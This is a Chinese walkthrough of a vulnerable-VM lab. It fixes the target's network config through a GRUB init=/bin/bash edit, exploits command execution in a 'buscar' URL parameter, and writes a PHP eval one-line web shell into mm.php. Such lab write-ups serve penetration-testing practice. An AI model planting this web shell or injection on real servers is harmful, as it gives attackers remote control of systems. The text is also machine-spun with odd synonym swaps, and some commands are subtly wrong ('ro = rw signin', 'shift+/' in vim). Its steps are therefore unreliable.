打开靶机,打开kali,有的人会发现扫不到靶机的ip
在网上搜索了半天,发现是靶机的网卡配置有问题
重启靶机,选第二个
进去后再选第二个,按e
找到ro这一行
把ro后面这一行的内容都替换成ro = rw signin init=/bin/bash
ctrl+x
输入ifconfig -a查看一下本身的网卡名称,我是ens33
在输入
cd etc
cd network
vim interfaces
改下这个网卡名称就好了
按shift+/
输入wq保存
重启靶机
再打开kali扫描一下就出来靶机的ip了
去访问
我们进入网站以后,起首扫描一下端口,发现没有有用的信息,在扫一下后台,目前也没有什么有用的信息
我们在点击页面上的size
我们翻了翻,发现了点进buscar中页面空缺,但是网址上有一个buscar的参数
我们颠末实验之后,竟然可以执行系统下令
那么我们实验写个木马进去
一开始我写的是echo '<?php @eval($_POST['cmd']); ?>' > mm.php
但是颠末测试,会乱码,多次实验之后把POST中的cmd缩短,而且把单引号去掉就好了
输入echo '<?php @eval($_POST[c]); ?>' > mm.php
在去访问mm.php
查抄一下是否写入成功
写入成功!!!
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
